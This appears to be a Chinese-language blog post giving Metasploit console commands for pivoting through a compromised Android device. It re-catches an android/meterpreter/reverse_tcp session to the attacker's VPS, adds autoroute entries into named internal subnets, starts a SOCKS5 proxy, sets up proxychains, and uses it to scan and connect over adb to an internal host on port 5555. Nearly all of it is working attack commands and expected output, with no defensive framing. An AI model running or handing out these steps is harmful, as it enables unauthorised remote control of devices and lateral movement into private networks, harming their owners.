msf_console
1. 确认 session 存活
msf > sessions -l
# 如果 session 已断开,重新获取
msf > use exploit/multi/handler
msf > set PAYLOAD android/meterpreter/reverse_tcp
msf > set LHOST <你的VPS IP>
msf > set LPORT 8080
msf > run -j
2. 添加内网路由
# 假设新 session 编号为 N
msf > sessions -i <N>
# 自动添加路由(推荐)
meterpreter > run autoroute -s 10.6.226.0/24
meterpreter > run autoroute -s 10.6.228.0/24
meterpreter > run autoroute -s 10.122.180.0/22
# 查看路由
meterpreter > run autoroute -p
# 回到后台
meterpreter > background
或者手动添加:
msf > route add 10.6.226.0/24 <N>
msf > route add 10.6.228.0/24 <N>
msf > route add 10.122.180.0/22 <N>
msf > route print
3. 启动 SOCKS5 代理
msf > use auxiliary/server/socks_proxy
msf > show options
# 配置
msf > set SRVHOST 127.0.0.1
msf > set SRVPORT 1080
msf > set VERSION 5
# 后台运行
msf > run -j
应该看到:
[*] Starting the SOCKS proxy server
[*] SOCKS proxy server started on 127.0.0.1:1080
4. 配置 proxychains
# 新开一个 VPS 终端
vi /etc/proxychains.conf
改为:
# 底部 [ProxyList] 段
[ProxyList]
socks5 127.0.0.1 1080
5. 验证隧道可用
# 测试已知开放端口
proxychains nmap -sT -Pn -p 5555 10.122.181.20
proxychains adb connect 10.122.181.20:5555
常见问题排查
# 查看代理是否在监听
ss -tlnp | grep 1080
# 查看 jobs 状态
msf > jobs -l
# 如果代理没起来,看是否端口被占用
msf > jobs -K # 清除所有 jobs
msf > use auxiliary/server/socks_proxy
msf > set SRVPORT 9050 # 换个端口
msf > run -j
# proxychains 配置也要相应修改
浙公网安备 33010602011771号